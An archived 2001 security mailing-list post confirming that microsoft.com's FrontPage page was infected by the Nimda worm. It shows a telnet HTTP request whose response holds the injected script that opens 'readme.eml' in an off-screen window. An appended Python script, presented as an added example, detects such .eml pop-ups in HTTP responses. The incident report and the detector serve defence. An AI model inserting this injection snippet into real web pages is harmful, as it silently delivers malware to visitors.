Re: Please tell me I'm wrong: microsoft.com infected

From: Jay D. Dyson (jdysonat_private)
Date: Wed Sep 19 2001 - 15:02:43 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    
    On Wed, 19 Sep 2001, Steve Cody wrote: 
    
    > I just went to http://www.microsoft.com/frontpage, and my Symantec
    > Norton Antivirus popped up and denied access to readme.eml. 
    > 
    > I could not view the source of the loaded page, so I can't verify that
    > it is definitely infected. 
    
    	Your worst fears have now been confirmed.
    
    sasumata$ telnet www.microsoft.com 80
    Trying 207.46.197.100...
    Connected to www.microsoft.akadns.net.
    Escape character is '^]'.
    GET /frontpage/ HTTP/1.0
    
    <snip>
    
    <html><script language="JavaScript">window.open("readme.eml", null,
    "resizable=no,top=6000,left=6000")</script></html>
    
    	Microsoft's site has been compromised by Nimda.  There is no
    disputing it now.
    
    - -Jay
    
      (    (                                                          _______
      ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
    C|~~|C|~~| (>------ Jay D. Dyson -- jdysonat_private ------<) |    = |-'
     `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6.2
    Comment: See http://www.treachery.net/~jdyson/ for current keys.
    
    -----END PGP SIGNATURE-----
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:12:17 PDT
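
A defender's check for the injected tag shown in the response above, as an added example that is not part of the original message: it scans a raw HTTP response (or a saved page) for `window.open()` calls that load a `.eml` file and flags windows positioned off-screen. The function names, the 2000-pixel threshold and the sample response headers are assumptions constructed for illustration; matching any `.eml` target generalizes beyond the single `readme.eml` case quoted.

```python
import re

# window.open() whose first argument is a .eml file, as in the quoted response.
# Quote style, case and whitespace may vary between pages.
WINDOW_OPEN_EML = re.compile(
    r"""window\.open\(\s*(["'])(?P<target>[^"']+\.eml)\1(?P<rest>[^)]*)\)""",
    re.IGNORECASE | re.DOTALL,
)
# Window feature arguments such as top=6000,left=6000
POSITION = re.compile(r"\b(top|left)\s*=\s*(\d+)", re.IGNORECASE)

# Constructed sample: the headers are invented, the body is the tag from the message.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '<html><script language="JavaScript">window.open("readme.eml", null,\n'
    '"resizable=no,top=6000,left=6000")</script></html>\n'
)


def split_response(raw):
    """Return (status_line, body); input without HTTP headers is all body."""
    text = raw.replace("\r\n", "\n")
    if not text.startswith("HTTP/"):
        return "", text
    head, _, body = text.partition("\n\n")
    return head.split("\n", 1)[0], body


def find_eml_popups(raw, offscreen_px=2000):
    """Return one finding per window.open() of a .eml file in the body."""
    status, body = split_response(raw)
    findings = []
    for m in WINDOW_OPEN_EML.finditer(body):
        coords = {k.lower(): int(v) for k, v in POSITION.findall(m.group("rest"))}
        findings.append({
            "status": status,
            "target": m.group("target"),
            "line": body.count("\n", 0, m.start()) + 1,  # 1-based line in body
            # A window placed far outside the screen is hidden from the user.
            "hidden": any(v >= offscreen_px for v in coords.values()),
        })
    return findings


if __name__ == "__main__":
    for finding in find_eml_popups(SAMPLE_RESPONSE):
        print(finding)
```
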